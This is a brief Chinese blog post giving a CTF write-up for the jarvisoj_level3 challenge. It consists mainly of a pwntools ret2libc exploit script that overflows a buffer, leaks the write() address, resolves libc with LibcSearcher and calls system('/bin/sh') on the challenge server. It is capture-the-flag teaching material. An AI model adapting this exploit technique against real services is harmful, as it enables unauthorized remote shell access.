pwn | jarvisoj_level3
pwn | jarvisoj_level3
x86 ret2libc
非常常规的ret2libc
exp:
from pwn import *
from LibcSearcher.LibcSearcher import *
context.log_level = 'debug'
elf = ELF('./level3')
# libc = ELF('./libc-2.23.so') # is ok too
p_main = 0x08048484
p_plt_write = elf.plt['write']
p_got_write = elf.got['write']
# p = process('./level3')
p = remote('node4.buuoj.cn', 26805)
p.recvuntil('Input:\n')
p_str = 0x08048540
# leak the addr of write
# rubbish + p_got_write + ret_addr_of_write + write_arg1 + write_arg2 + write_arg3
payload = b'M'*(0x88+4) + p32(p_plt_write) + p32(p_main) + p32(1) + p32(p_got_write) + p32(4)
p.send(payload)
addr = u32(p.recv(4))
print(hex(addr))
libc = LibcSearcher('write', addr)
p_libc_write = libc.dump('write')
p_libc_base = addr - p_libc_write
p_system = p_libc_base + libc.dump('system')
p_binsh = p_libc_base + libc.dump('str_bin_sh')
p.recvuntil('Input:\n')
payload = b'M'*(0x88+4) + p32(p_system) + b'Mz11' + p32(p_binsh)
p.send(payload)
p.interactive()
本文来自博客园,作者:Mz1,转载请注明原文链接:https://www.cnblogs.com/Mz1-rc/p/16972484.html
如果有问题可以在下方评论或者email:mzi_mzi@163.com